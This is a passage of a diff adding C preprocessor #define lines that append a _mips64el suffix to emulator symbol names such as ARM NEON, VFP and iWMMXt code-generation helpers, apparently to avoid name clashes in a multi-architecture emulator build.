gen_helper_neon_qzip16_mips64el +#define gen_helper_neon_qzip32 gen_helper_neon_qzip32_mips64el +#define gen_helper_neon_qzip8 gen_helper_neon_qzip8_mips64el +#define gen_helper_neon_rhadd_s16 gen_helper_neon_rhadd_s16_mips64el +#define gen_helper_neon_rhadd_s32 gen_helper_neon_rhadd_s32_mips64el +#define gen_helper_neon_rhadd_s8 gen_helper_neon_rhadd_s8_mips64el +#define gen_helper_neon_rhadd_u16 gen_helper_neon_rhadd_u16_mips64el +#define gen_helper_neon_rhadd_u32 gen_helper_neon_rhadd_u32_mips64el +#define gen_helper_neon_rhadd_u8 gen_helper_neon_rhadd_u8_mips64el +#define gen_helper_neon_rshl_s16 gen_helper_neon_rshl_s16_mips64el +#define gen_helper_neon_rshl_s32 gen_helper_neon_rshl_s32_mips64el +#define gen_helper_neon_rshl_s64 gen_helper_neon_rshl_s64_mips64el +#define gen_helper_neon_rshl_s8 gen_helper_neon_rshl_s8_mips64el +#define gen_helper_neon_rshl_u16 gen_helper_neon_rshl_u16_mips64el +#define gen_helper_neon_rshl_u32 gen_helper_neon_rshl_u32_mips64el +#define gen_helper_neon_rshl_u64 gen_helper_neon_rshl_u64_mips64el +#define gen_helper_neon_rshl_u8 gen_helper_neon_rshl_u8_mips64el +#define gen_helper_neon_shl_s16 gen_helper_neon_shl_s16_mips64el +#define gen_helper_neon_shl_s32 gen_helper_neon_shl_s32_mips64el +#define gen_helper_neon_shl_s64 gen_helper_neon_shl_s64_mips64el +#define gen_helper_neon_shl_s8 gen_helper_neon_shl_s8_mips64el +#define gen_helper_neon_shl_u16 gen_helper_neon_shl_u16_mips64el +#define gen_helper_neon_shl_u32 gen_helper_neon_shl_u32_mips64el +#define gen_helper_neon_shl_u64 gen_helper_neon_shl_u64_mips64el +#define gen_helper_neon_shl_u8 gen_helper_neon_shl_u8_mips64el +#define gen_helper_neon_subl_u16 gen_helper_neon_subl_u16_mips64el +#define gen_helper_neon_subl_u32 gen_helper_neon_subl_u32_mips64el +#define gen_helper_neon_sub_u16 gen_helper_neon_sub_u16_mips64el +#define gen_helper_neon_sub_u8 gen_helper_neon_sub_u8_mips64el +#define gen_helper_neon_tbl gen_helper_neon_tbl_mips64el +#define gen_helper_neon_tst_u16 
gen_helper_neon_tst_u16_mips64el +#define gen_helper_neon_tst_u32 gen_helper_neon_tst_u32_mips64el +#define gen_helper_neon_tst_u8 gen_helper_neon_tst_u8_mips64el +#define gen_helper_neon_unarrow_sat16 gen_helper_neon_unarrow_sat16_mips64el +#define gen_helper_neon_unarrow_sat32 gen_helper_neon_unarrow_sat32_mips64el +#define gen_helper_neon_unarrow_sat8 gen_helper_neon_unarrow_sat8_mips64el +#define gen_helper_neon_unzip16 gen_helper_neon_unzip16_mips64el +#define gen_helper_neon_unzip8 gen_helper_neon_unzip8_mips64el +#define gen_helper_neon_widen_s16 gen_helper_neon_widen_s16_mips64el +#define gen_helper_neon_widen_s8 gen_helper_neon_widen_s8_mips64el +#define gen_helper_neon_widen_u16 gen_helper_neon_widen_u16_mips64el +#define gen_helper_neon_widen_u8 gen_helper_neon_widen_u8_mips64el +#define gen_helper_neon_zip16 gen_helper_neon_zip16_mips64el +#define gen_helper_neon_zip8 gen_helper_neon_zip8_mips64el +#define gen_helper_pre_hvc gen_helper_pre_hvc_mips64el +#define gen_helper_pre_smc gen_helper_pre_smc_mips64el +#define gen_helper_qadd16 gen_helper_qadd16_mips64el +#define gen_helper_qadd8 gen_helper_qadd8_mips64el +#define gen_helper_qaddsubx gen_helper_qaddsubx_mips64el +#define gen_helper_qsub16 gen_helper_qsub16_mips64el +#define gen_helper_qsub8 gen_helper_qsub8_mips64el +#define gen_helper_qsubaddx gen_helper_qsubaddx_mips64el +#define gen_helper_rbit gen_helper_rbit_mips64el +#define gen_helper_recpe_f32 gen_helper_recpe_f32_mips64el +#define gen_helper_recpe_u32 gen_helper_recpe_u32_mips64el +#define gen_helper_recps_f32 gen_helper_recps_f32_mips64el +#define gen_helper_rintd gen_helper_rintd_mips64el +#define gen_helper_rintd_exact gen_helper_rintd_exact_mips64el +#define gen_helper_rints gen_helper_rints_mips64el +#define gen_helper_rints_exact gen_helper_rints_exact_mips64el +#define gen_helper_ror_cc gen_helper_ror_cc_mips64el +#define gen_helper_rsqrte_f32 gen_helper_rsqrte_f32_mips64el +#define gen_helper_rsqrte_u32 
gen_helper_rsqrte_u32_mips64el +#define gen_helper_rsqrts_f32 gen_helper_rsqrts_f32_mips64el +#define gen_helper_sadd16 gen_helper_sadd16_mips64el +#define gen_helper_sadd8 gen_helper_sadd8_mips64el +#define gen_helper_saddsubx gen_helper_saddsubx_mips64el +#define gen_helper_sar_cc gen_helper_sar_cc_mips64el +#define gen_helper_sdiv gen_helper_sdiv_mips64el +#define gen_helper_sel_flags gen_helper_sel_flags_mips64el +#define gen_helper_set_cp_reg gen_helper_set_cp_reg_mips64el +#define gen_helper_set_cp_reg64 gen_helper_set_cp_reg64_mips64el +#define gen_helper_set_neon_rmode gen_helper_set_neon_rmode_mips64el +#define gen_helper_set_r13_banked gen_helper_set_r13_banked_mips64el +#define gen_helper_set_rmode gen_helper_set_rmode_mips64el +#define gen_helper_set_user_reg gen_helper_set_user_reg_mips64el +#define gen_helper_shadd16 gen_helper_shadd16_mips64el +#define gen_helper_shadd8 gen_helper_shadd8_mips64el +#define gen_helper_shaddsubx gen_helper_shaddsubx_mips64el +#define gen_helper_shl_cc gen_helper_shl_cc_mips64el +#define gen_helper_shr_cc gen_helper_shr_cc_mips64el +#define gen_helper_shsub16 gen_helper_shsub16_mips64el +#define gen_helper_shsub8 gen_helper_shsub8_mips64el +#define gen_helper_shsubaddx gen_helper_shsubaddx_mips64el +#define gen_helper_ssat gen_helper_ssat_mips64el +#define gen_helper_ssat16 gen_helper_ssat16_mips64el +#define gen_helper_ssub16 gen_helper_ssub16_mips64el +#define gen_helper_ssub8 gen_helper_ssub8_mips64el +#define gen_helper_ssubaddx gen_helper_ssubaddx_mips64el +#define gen_helper_sub_saturate gen_helper_sub_saturate_mips64el +#define gen_helper_sxtb16 gen_helper_sxtb16_mips64el +#define gen_helper_uadd16 gen_helper_uadd16_mips64el +#define gen_helper_uadd8 gen_helper_uadd8_mips64el +#define gen_helper_uaddsubx gen_helper_uaddsubx_mips64el +#define gen_helper_udiv gen_helper_udiv_mips64el +#define gen_helper_uhadd16 gen_helper_uhadd16_mips64el +#define gen_helper_uhadd8 gen_helper_uhadd8_mips64el +#define 
gen_helper_uhaddsubx gen_helper_uhaddsubx_mips64el +#define gen_helper_uhsub16 gen_helper_uhsub16_mips64el +#define gen_helper_uhsub8 gen_helper_uhsub8_mips64el +#define gen_helper_uhsubaddx gen_helper_uhsubaddx_mips64el +#define gen_helper_uqadd16 gen_helper_uqadd16_mips64el +#define gen_helper_uqadd8 gen_helper_uqadd8_mips64el +#define gen_helper_uqaddsubx gen_helper_uqaddsubx_mips64el +#define gen_helper_uqsub16 gen_helper_uqsub16_mips64el +#define gen_helper_uqsub8 gen_helper_uqsub8_mips64el +#define gen_helper_uqsubaddx gen_helper_uqsubaddx_mips64el +#define gen_helper_usad8 gen_helper_usad8_mips64el +#define gen_helper_usat gen_helper_usat_mips64el +#define gen_helper_usat16 gen_helper_usat16_mips64el +#define gen_helper_usub16 gen_helper_usub16_mips64el +#define gen_helper_usub8 gen_helper_usub8_mips64el +#define gen_helper_usubaddx gen_helper_usubaddx_mips64el +#define gen_helper_uxtb16 gen_helper_uxtb16_mips64el +#define gen_helper_v7m_mrs gen_helper_v7m_mrs_mips64el +#define gen_helper_v7m_msr gen_helper_v7m_msr_mips64el +#define gen_helper_vfp_absd gen_helper_vfp_absd_mips64el +#define gen_helper_vfp_abss gen_helper_vfp_abss_mips64el +#define gen_helper_vfp_addd gen_helper_vfp_addd_mips64el +#define gen_helper_vfp_adds gen_helper_vfp_adds_mips64el +#define gen_helper_vfp_cmpd gen_helper_vfp_cmpd_mips64el +#define gen_helper_vfp_cmped gen_helper_vfp_cmped_mips64el +#define gen_helper_vfp_cmpes gen_helper_vfp_cmpes_mips64el +#define gen_helper_vfp_cmps gen_helper_vfp_cmps_mips64el +#define gen_helper_vfp_divd gen_helper_vfp_divd_mips64el +#define gen_helper_vfp_divs gen_helper_vfp_divs_mips64el +#define gen_helper_vfp_fcvtds gen_helper_vfp_fcvtds_mips64el +#define gen_helper_vfp_fcvt_f16_to_f32 gen_helper_vfp_fcvt_f16_to_f32_mips64el +#define gen_helper_vfp_fcvt_f16_to_f64 gen_helper_vfp_fcvt_f16_to_f64_mips64el +#define gen_helper_vfp_fcvt_f32_to_f16 gen_helper_vfp_fcvt_f32_to_f16_mips64el +#define gen_helper_vfp_fcvt_f64_to_f16 
gen_helper_vfp_fcvt_f64_to_f16_mips64el +#define gen_helper_vfp_fcvtsd gen_helper_vfp_fcvtsd_mips64el +#define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_mips64el +#define gen_helper_vfp_maxnumd gen_helper_vfp_maxnumd_mips64el +#define gen_helper_vfp_maxnums gen_helper_vfp_maxnums_mips64el +#define gen_helper_vfp_maxs gen_helper_vfp_maxs_mips64el +#define gen_helper_vfp_minnumd gen_helper_vfp_minnumd_mips64el +#define gen_helper_vfp_minnums gen_helper_vfp_minnums_mips64el +#define gen_helper_vfp_mins gen_helper_vfp_mins_mips64el +#define gen_helper_vfp_muladdd gen_helper_vfp_muladdd_mips64el +#define gen_helper_vfp_muladds gen_helper_vfp_muladds_mips64el +#define gen_helper_vfp_muld gen_helper_vfp_muld_mips64el +#define gen_helper_vfp_muls gen_helper_vfp_muls_mips64el +#define gen_helper_vfp_negd gen_helper_vfp_negd_mips64el +#define gen_helper_vfp_negs gen_helper_vfp_negs_mips64el +#define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_mips64el +#define gen_helper_vfp_shtod gen_helper_vfp_shtod_mips64el +#define gen_helper_vfp_shtos gen_helper_vfp_shtos_mips64el +#define gen_helper_vfp_sitod gen_helper_vfp_sitod_mips64el +#define gen_helper_vfp_sitos gen_helper_vfp_sitos_mips64el +#define gen_helper_vfp_sltod gen_helper_vfp_sltod_mips64el +#define gen_helper_vfp_sltos gen_helper_vfp_sltos_mips64el +#define gen_helper_vfp_sqrtd gen_helper_vfp_sqrtd_mips64el +#define gen_helper_vfp_sqrts gen_helper_vfp_sqrts_mips64el +#define gen_helper_vfp_subd gen_helper_vfp_subd_mips64el +#define gen_helper_vfp_subs gen_helper_vfp_subs_mips64el +#define gen_helper_vfp_toshd_round_to_zero gen_helper_vfp_toshd_round_to_zero_mips64el +#define gen_helper_vfp_toshs_round_to_zero gen_helper_vfp_toshs_round_to_zero_mips64el +#define gen_helper_vfp_tosid gen_helper_vfp_tosid_mips64el +#define gen_helper_vfp_tosis gen_helper_vfp_tosis_mips64el +#define gen_helper_vfp_tosizd gen_helper_vfp_tosizd_mips64el +#define gen_helper_vfp_tosizs gen_helper_vfp_tosizs_mips64el +#define 
gen_helper_vfp_tosld gen_helper_vfp_tosld_mips64el +#define gen_helper_vfp_tosld_round_to_zero gen_helper_vfp_tosld_round_to_zero_mips64el +#define gen_helper_vfp_tosls gen_helper_vfp_tosls_mips64el +#define gen_helper_vfp_tosls_round_to_zero gen_helper_vfp_tosls_round_to_zero_mips64el +#define gen_helper_vfp_touhd_round_to_zero gen_helper_vfp_touhd_round_to_zero_mips64el +#define gen_helper_vfp_touhs_round_to_zero gen_helper_vfp_touhs_round_to_zero_mips64el +#define gen_helper_vfp_touid gen_helper_vfp_touid_mips64el +#define gen_helper_vfp_touis gen_helper_vfp_touis_mips64el +#define gen_helper_vfp_touizd gen_helper_vfp_touizd_mips64el +#define gen_helper_vfp_touizs gen_helper_vfp_touizs_mips64el +#define gen_helper_vfp_tould gen_helper_vfp_tould_mips64el +#define gen_helper_vfp_tould_round_to_zero gen_helper_vfp_tould_round_to_zero_mips64el +#define gen_helper_vfp_touls gen_helper_vfp_touls_mips64el +#define gen_helper_vfp_touls_round_to_zero gen_helper_vfp_touls_round_to_zero_mips64el +#define gen_helper_vfp_uhtod gen_helper_vfp_uhtod_mips64el +#define gen_helper_vfp_uhtos gen_helper_vfp_uhtos_mips64el +#define gen_helper_vfp_uitod gen_helper_vfp_uitod_mips64el +#define gen_helper_vfp_uitos gen_helper_vfp_uitos_mips64el +#define gen_helper_vfp_ultod gen_helper_vfp_ultod_mips64el +#define gen_helper_vfp_ultos gen_helper_vfp_ultos_mips64el +#define gen_helper_wfe gen_helper_wfe_mips64el +#define gen_helper_wfi gen_helper_wfi_mips64el +#define gen_hvc gen_hvc_mips64el +#define gen_intermediate_code_internal gen_intermediate_code_internal_mips64el +#define gen_intermediate_code_internal_a64 gen_intermediate_code_internal_a64_mips64el +#define gen_iwmmxt_address gen_iwmmxt_address_mips64el +#define gen_iwmmxt_shift gen_iwmmxt_shift_mips64el +#define gen_jmp gen_jmp_mips64el +#define gen_load_and_replicate gen_load_and_replicate_mips64el +#define gen_load_exclusive gen_load_exclusive_mips64el +#define gen_logic_CC gen_logic_CC_mips64el +#define gen_logicq_cc 
gen_logicq_cc_mips64el +#define gen_lookup_tb gen_lookup_tb_mips64el +#define gen_mov_F0_vreg gen_mov_F0_vreg_mips64el +#define gen_mov_F1_vreg gen_mov_F1_vreg_mips64el +#define gen_mov_vreg_F0 gen_mov_vreg_F0_mips64el +#define gen_muls_i64_i32 gen_muls_i64_i32_mips64el +#define gen_mulu_i64_i32 gen_mulu_i64_i32_mips64el +#define gen_mulxy gen_mulxy_mips64el +#define gen_neon_add gen_neon_add_mips64el +#define gen_neon_addl gen_neon_addl_mips64el +#define gen_neon_addl_saturate gen_neon_addl_saturate_mips64el +#define gen_neon_bsl gen_neon_bsl_mips64el +#define gen_neon_dup_high16 gen_neon_dup_high16_mips64el +#define gen_neon_dup_low16 gen_neon_dup_low16_mips64el +#define gen_neon_dup_u8 gen_neon_dup_u8_mips64el +#define gen_neon_mull gen_neon_mull_mips64el +#define gen_neon_narrow gen_neon_narrow_mips64el +#define gen_neon_narrow_op gen_neon_narrow_op_mips64el +#define gen_neon_narrow_sats gen_neon_narrow_sats_mips64el +#define gen_neon_narrow_satu gen_neon_narrow_satu_mips64el +#define gen_neon_negl gen_neon_negl_mips64el +#define gen_neon_rsb gen_neon_rsb_mips64el +#define gen_neon_shift_narrow gen_neon_shift_narrow_mips64el +#define gen_neon_subl gen_neon_subl_mips64el +#define gen_neon_trn_u16 gen_neon_trn_u16_mips64el +#define gen_neon_trn_u8 gen_neon_trn_u8_mips64el +#define gen_neon_unarrow_sats gen_neon_unarrow_sats_mips64el +#define gen_neon_unzip gen_neon_unzip_mips64el +#define gen_neon_widen gen_neon_widen_mips64el +#define gen_neon_zip gen_neon_zip_mips64el +#define gen_new_label gen_new_label_mips64el +#define gen_nop_hint gen_nop_hint_mips64el +#define gen_op_iwmmxt_addl_M0_wRn gen_op_iwmmxt_addl_M0_wRn_mips64el +#define gen_op_iwmmxt_addnb_M0_wRn gen_op_iwmmxt_addnb_M0_wRn_mips64el +#define gen_op_iwmmxt_addnl_M0_wRn gen_op_iwmmxt_addnl_M0_wRn_mips64el +#define gen_op_iwmmxt_addnw_M0_wRn gen_op_iwmmxt_addnw_M0_wRn_mips64el +#define gen_op_iwmmxt_addsb_M0_wRn gen_op_iwmmxt_addsb_M0_wRn_mips64el +#define gen_op_iwmmxt_addsl_M0_wRn 
gen_op_iwmmxt_addsl_M0_wRn_mips64el +#define gen_op_iwmmxt_addsw_M0_wRn gen_op_iwmmxt_addsw_M0_wRn_mips64el +#define gen_op_iwmmxt_addub_M0_wRn gen_op_iwmmxt_addub_M0_wRn_mips64el +#define gen_op_iwmmxt_addul_M0_wRn gen_op_iwmmxt_addul_M0_wRn_mips64el +#define gen_op_iwmmxt_adduw_M0_wRn gen_op_iwmmxt_adduw_M0_wRn_mips64el +#define gen_op_iwmmxt_andq_M0_wRn gen_op_iwmmxt_andq_M0_wRn_mips64el +#define gen_op_iwmmxt_avgb0_M0_wRn gen_op_iwmmxt_avgb0_M0_wRn_mips64el +#define gen_op_iwmmxt_avgb1_M0_wRn gen_op_iwmmxt_avgb1_M0_wRn_mips64el +#define gen_op_iwmmxt_avgw0_M0_wRn gen_op_iwmmxt_avgw0_M0_wRn_mips64el +#define gen_op_iwmmxt_avgw1_M0_wRn gen_op_iwmmxt_avgw1_M0_wRn_mips64el +#define gen_op_iwmmxt_cmpeqb_M0_wRn gen_op_iwmmxt_cmpeqb_M0_wRn_mips64el +#define gen_op_iwmmxt_cmpeql_M0_wRn gen_op_iwmmxt_cmpeql_M0_wRn_mips64el +#define gen_op_iwmmxt_cmpeqw_M0_wRn gen_op_iwmmxt_cmpeqw_M0_wRn_mips64el +#define gen_op_iwmmxt_cmpgtsb_M0_wRn gen_op_iwmmxt_cmpgtsb_M0_wRn_mips64el +#define gen_op_iwmmxt_cmpgtsl_M0_wRn gen_op_iwmmxt_cmpgtsl_M0_wRn_mips64el +#define gen_op_iwmmxt_cmpgtsw_M0_wRn gen_op_iwmmxt_cmpgtsw_M0_wRn_mips64el +#define gen_op_iwmmxt_cmpgtub_M0_wRn gen_op_iwmmxt_cmpgtub_M0_wRn_mips64el +#define gen_op_iwmmxt_cmpgtul_M0_wRn gen_op_iwmmxt_cmpgtul_M0_wRn_mips64el +#define gen_op_iwmmxt_cmpgtuw_M0_wRn gen_op_iwmmxt_cmpgtuw_M0_wRn_mips64el +#define gen_op_iwmmxt_macsw_M0_wRn gen_op_iwmmxt_macsw_M0_wRn_mips64el +#define gen_op_iwmmxt_macuw_M0_wRn gen_op_iwmmxt_macuw_M0_wRn_mips64el +#define gen_op_iwmmxt_maddsq_M0_wRn gen_op_iwmmxt_maddsq_M0_wRn_mips64el +#define gen_op_iwmmxt_madduq_M0_wRn gen_op_iwmmxt_madduq_M0_wRn_mips64el +#define gen_op_iwmmxt_maxsb_M0_wRn gen_op_iwmmxt_maxsb_M0_wRn_mips64el +#define gen_op_iwmmxt_maxsl_M0_wRn gen_op_iwmmxt_maxsl_M0_wRn_mips64el +#define gen_op_iwmmxt_maxsw_M0_wRn gen_op_iwmmxt_maxsw_M0_wRn_mips64el +#define gen_op_iwmmxt_maxub_M0_wRn gen_op_iwmmxt_maxub_M0_wRn_mips64el +#define gen_op_iwmmxt_maxul_M0_wRn 
gen_op_iwmmxt_maxul_M0_wRn_mips64el +#define gen_op_iwmmxt_maxuw_M0_wRn gen_op_iwmmxt_maxuw_M0_wRn_mips64el +#define gen_op_iwmmxt_minsb_M0_wRn gen_op_iwmmxt_minsb_M0_wRn_mips64el +#define gen_op_iwmmxt_minsl_M0_wRn gen_op_iwmmxt_minsl_M0_wRn_mips64el +#define gen_op_iwmmxt_minsw_M0_wRn gen_op_iwmmxt_minsw_M0_wRn_mips64el +#define gen_op_iwmmxt_minub_M0_wRn gen_op_iwmmxt_minub_M0_wRn_mips64el +#define gen_op_iwmmxt_minul_M0_wRn gen_op_iwmmxt_minul_M0_wRn_mips64el +#define gen_op_iwmmxt_minuw_M0_wRn gen_op_iwmmxt_minuw_M0_wRn_mips64el +#define gen_op_iwmmxt_movq_M0_wRn gen_op_iwmmxt_movq_M0_wRn_mips64el +#define gen_op_iwmmxt_movq_wRn_M0 gen_op_iwmmxt_movq_wRn_M0_mips64el +#define gen_op_iwmmxt_mulshw_M0_wRn gen_op_iwmmxt_mulshw_M0_wRn_mips64el +#define gen_op_iwmmxt_mulslw_M0_wRn gen_op_iwmmxt_mulslw_M0_wRn_mips64el +#define gen_op_iwmmxt_muluhw_M0_wRn gen_op_iwmmxt_muluhw_M0_wRn_mips64el +#define gen_op_iwmmxt_mululw_M0_wRn gen_op_iwmmxt_mululw_M0_wRn_mips64el +#define gen_op_iwmmxt_orq_M0_wRn gen_op_iwmmxt_orq_M0_wRn_mips64el +#define gen_op_iwmmxt_packsl_M0_wRn gen_op_iwmmxt_packsl_M0_wRn_mips64el +#define gen_op_iwmmxt_packsq_M0_wRn gen_op_iwmmxt_packsq_M0_wRn_mips64el +#define gen_op_iwmmxt_packsw_M0_wRn gen_op_iwmmxt_packsw_M0_wRn_mips64el +#define gen_op_iwmmxt_packul_M0_wRn gen_op_iwmmxt_packul_M0_wRn_mips64el +#define gen_op_iwmmxt_packuq_M0_wRn gen_op_iwmmxt_packuq_M0_wRn_mips64el +#define gen_op_iwmmxt_packuw_M0_wRn gen_op_iwmmxt_packuw_M0_wRn_mips64el +#define gen_op_iwmmxt_sadb_M0_wRn gen_op_iwmmxt_sadb_M0_wRn_mips64el +#define gen_op_iwmmxt_sadw_M0_wRn gen_op_iwmmxt_sadw_M0_wRn_mips64el +#define gen_op_iwmmxt_set_cup gen_op_iwmmxt_set_cup_mips64el +#define gen_op_iwmmxt_set_mup gen_op_iwmmxt_set_mup_mips64el +#define gen_op_iwmmxt_setpsr_nz gen_op_iwmmxt_setpsr_nz_mips64el +#define gen_op_iwmmxt_subnb_M0_wRn gen_op_iwmmxt_subnb_M0_wRn_mips64el +#define gen_op_iwmmxt_subnl_M0_wRn gen_op_iwmmxt_subnl_M0_wRn_mips64el +#define gen_op_iwmmxt_subnw_M0_wRn 
gen_op_iwmmxt_subnw_M0_wRn_mips64el +#define gen_op_iwmmxt_subsb_M0_wRn gen_op_iwmmxt_subsb_M0_wRn_mips64el +#define gen_op_iwmmxt_subsl_M0_wRn gen_op_iwmmxt_subsl_M0_wRn_mips64el +#define gen_op_iwmmxt_subsw_M0_wRn gen_op_iwmmxt_subsw_M0_wRn_mips64el +#define gen_op_iwmmxt_subub_M0_wRn gen_op_iwmmxt_subub_M0_wRn_mips64el +#define gen_op_iwmmxt_subul_M0_wRn gen_op_iwmmxt_subul_M0_wRn_mips64el +#define gen_op_iwmmxt_subuw_M0_wRn gen_op_iwmmxt_subuw_M0_wRn_mips64el +#define gen_op_iwmmxt_unpackhb_M0_wRn gen_op_iwmmxt_unpackhb_M0_wRn_mips64el +#define gen_op_iwmmxt_unpackhl_M0_wRn gen_op_iwmmxt_unpackhl_M0_wRn_mips64el +#define gen_op_iwmmxt_unpackhsb_M0 gen_op_iwmmxt_unpackhsb_M0_mips64el +#define gen_op_iwmmxt_unpackhsl_M0 gen_op_iwmmxt_unpackhsl_M0_mips64el +#define gen_op_iwmmxt_unpackhsw_M0 gen_op_iwmmxt_unpackhsw_M0_mips64el +#define gen_op_iwmmxt_unpackhub_M0 gen_op_iwmmxt_unpackhub_M0_mips64el +#define gen_op_iwmmxt_unpackhul_M0 gen_op_iwmmxt_unpackhul_M0_mips64el +#define gen_op_iwmmxt_unpackhuw_M0 gen_op_iwmmxt_unpackhuw_M0_mips64el +#define gen_op_iwmmxt_unpackhw_M0_wRn gen_op_iwmmxt_unpackhw_M0_wRn_mips64el +#define gen_op_iwmmxt_unpacklb_M0_wRn gen_op_iwmmxt_unpacklb_M0_wRn_mips64el +#define gen_op_iwmmxt_unpackll_M0_wRn gen_op_iwmmxt_unpackll_M0_wRn_mips64el +#define gen_op_iwmmxt_unpacklsb_M0 gen_op_iwmmxt_unpacklsb_M0_mips64el +#define gen_op_iwmmxt_unpacklsl_M0 gen_op_iwmmxt_unpacklsl_M0_mips64el +#define gen_op_iwmmxt_unpacklsw_M0 gen_op_iwmmxt_unpacklsw_M0_mips64el +#define gen_op_iwmmxt_unpacklub_M0 gen_op_iwmmxt_unpacklub_M0_mips64el +#define gen_op_iwmmxt_unpacklul_M0 gen_op_iwmmxt_unpacklul_M0_mips64el +#define gen_op_iwmmxt_unpackluw_M0 gen_op_iwmmxt_unpackluw_M0_mips64el +#define gen_op_iwmmxt_unpacklw_M0_wRn gen_op_iwmmxt_unpacklw_M0_wRn_mips64el +#define gen_op_iwmmxt_xorq_M0_wRn gen_op_iwmmxt_xorq_M0_wRn_mips64el +#define gen_rev16 gen_rev16_mips64el +#define gen_revsh gen_revsh_mips64el +#define gen_rfe gen_rfe_mips64el +#define gen_sar 
gen_sar_mips64el +#define gen_sbc_CC gen_sbc_CC_mips64el +#define gen_sbfx gen_sbfx_mips64el +#define gen_set_CF_bit31 gen_set_CF_bit31_mips64el +#define gen_set_condexec gen_set_condexec_mips64el +#define gen_set_cpsr gen_set_cpsr_mips64el +#define gen_set_label gen_set_label_mips64el +#define gen_set_pc_im gen_set_pc_im_mips64el +#define gen_set_psr gen_set_psr_mips64el +#define gen_set_psr_im gen_set_psr_im_mips64el +#define gen_shl gen_shl_mips64el +#define gen_shr gen_shr_mips64el +#define gen_smc gen_smc_mips64el +#define gen_smul_dual gen_smul_dual_mips64el +#define gen_srs gen_srs_mips64el +#define gen_ss_advance gen_ss_advance_mips64el +#define gen_step_complete_exception gen_step_complete_exception_mips64el +#define gen_store_exclusive gen_store_exclusive_mips64el +#define gen_storeq_reg gen_storeq_reg_mips64el +#define gen_sub_carry gen_sub_carry_mips64el +#define gen_sub_CC gen_sub_CC_mips64el +#define gen_subq_msw gen_subq_msw_mips64el +#define gen_swap_half gen_swap_half_mips64el +#define gen_thumb2_data_op gen_thumb2_data_op_mips64el +#define gen_thumb2_parallel_addsub gen_thumb2_parallel_addsub_mips64el +#define gen_ubfx gen_ubfx_mips64el +#define gen_vfp_abs gen_vfp_abs_mips64el +#define gen_vfp_add gen_vfp_add_mips64el +#define gen_vfp_cmp gen_vfp_cmp_mips64el +#define gen_vfp_cmpe gen_vfp_cmpe_mips64el +#define gen_vfp_div gen_vfp_div_mips64el +#define gen_vfp_F1_ld0 gen_vfp_F1_ld0_mips64el +#define gen_vfp_F1_mul gen_vfp_F1_mul_mips64el +#define gen_vfp_F1_neg gen_vfp_F1_neg_mips64el +#define gen_vfp_ld gen_vfp_ld_mips64el +#define gen_vfp_mrs gen_vfp_mrs_mips64el +#define gen_vfp_msr gen_vfp_msr_mips64el +#define gen_vfp_mul gen_vfp_mul_mips64el +#define gen_vfp_neg gen_vfp_neg_mips64el +#define gen_vfp_shto gen_vfp_shto_mips64el +#define gen_vfp_sito gen_vfp_sito_mips64el +#define gen_vfp_slto gen_vfp_slto_mips64el +#define gen_vfp_sqrt gen_vfp_sqrt_mips64el +#define gen_vfp_st gen_vfp_st_mips64el +#define gen_vfp_sub gen_vfp_sub_mips64el 
+#define gen_vfp_tosh gen_vfp_tosh_mips64el +#define gen_vfp_tosi gen_vfp_tosi_mips64el +#define gen_vfp_tosiz gen_vfp_tosiz_mips64el +#define gen_vfp_tosl gen_vfp_tosl_mips64el +#define gen_vfp_touh gen_vfp_touh_mips64el +#define gen_vfp_toui gen_vfp_toui_mips64el +#define gen_vfp_touiz gen_vfp_touiz_mips64el +#define gen_vfp_toul gen_vfp_toul_mips64el +#define gen_vfp_uhto gen_vfp_uhto_mips64el +#define gen_vfp_uito gen_vfp_uito_mips64el +#define gen_vfp_ulto gen_vfp_ulto_mips64el +#define get_arm_cp_reginfo get_arm_cp_reginfo_mips64el +#define get_clock get_clock_mips64el +#define get_clock_realtime get_clock_realtime_mips64el +#define get_constraint_priority get_constraint_priority_mips64el +#define get_float_exception_flags get_float_exception_flags_mips64el +#define get_float_rounding_mode get_float_rounding_mode_mips64el +#define get_fpstatus_ptr get_fpstatus_ptr_mips64el +#define get_level1_table_address get_level1_table_address_mips64el +#define get_mem_index get_mem_index_mips64el +#define get_next_param_value get_next_param_value_mips64el +#define get_opt_name get_opt_name_mips64el +#define get_opt_value get_opt_value_mips64el +#define get_page_addr_code get_page_addr_code_mips64el +#define get_param_value get_param_value_mips64el +#define get_phys_addr get_phys_addr_mips64el +#define get_phys_addr_lpae get_phys_addr_lpae_mips64el +#define get_phys_addr_mpu get_phys_addr_mpu_mips64el +#define get_phys_addr_v5 get_phys_addr_v5_mips64el +#define get_phys_addr_v6 get_phys_addr_v6_mips64el +#define get_system_memory get_system_memory_mips64el +#define get_ticks_per_sec get_ticks_per_sec_mips64el +#define g_list_insert_sorted_merged g_list_insert_sorted_merged_mips64el +#define _GLOBAL_OFFSET_TABLE_ _GLOBAL_OFFSET_TABLE__mips64el +#define gt_cntfrq_access gt_cntfrq_access_mips64el +#define gt_cnt_read gt_cnt_read_mips64el +#define gt_cnt_reset gt_cnt_reset_mips64el +#define gt_counter_access gt_counter_access_mips64el +#define gt_ctl_write 
gt_ctl_write_mips64el +#define gt_cval_write gt_cval_write_mips64el +#define gt_get_countervalue gt_get_countervalue_mips64el +#define gt_pct_access gt_pct_access_mips64el +#define gt_ptimer_access gt_ptimer_access_mips64el +#define gt_recalc_timer gt_recalc_timer_mips64el +#define gt_timer_access gt_timer_access_mips64el +#define gt_tval_read gt_tval_read_mips64el +#define gt_tval_write gt_tval_write_mips64el +#define gt_vct_access gt_vct_access_mips64el +#define gt_vtimer_access gt_vtimer_access_mips64el +#define guest_phys_blocks_free guest_phys_blocks_free_mips64el +#define guest_phys_blocks_init guest_phys_blocks_init_mips64el +#define handle_vcvt handle_vcvt_mips64el +#define handle_vminmaxnm handle_vminmaxnm_mips64el +#define handle_vrint handle_vrint_mips64el +#define handle_vsel handle_vsel_mips64el +#define has_help_option has_help_option_mips64el +#define have_bmi1 have_bmi1_mips64el +#define have_bmi2 have_bmi2_mips64el +#define hcr_write hcr_write_mips64el +#define helper_access_check_cp_reg helper_access_check_cp_reg_mips64el +#define helper_add_saturate helper_add_saturate_mips64el +#define helper_add_setq helper_add_setq_mips64el +#define helper_add_usaturate helper_add_usaturate_mips64el +#define helper_be_ldl_cmmu helper_be_ldl_cmmu_mips64el +#define helper_be_ldq_cmmu helper_be_ldq_cmmu_mips64el +#define helper_be_ldq_mmu helper_be_ldq_mmu_mips64el +#define helper_be_ldsl_mmu helper_be_ldsl_mmu_mips64el +#define helper_be_ldsw_mmu helper_be_ldsw_mmu_mips64el +#define helper_be_ldul_mmu 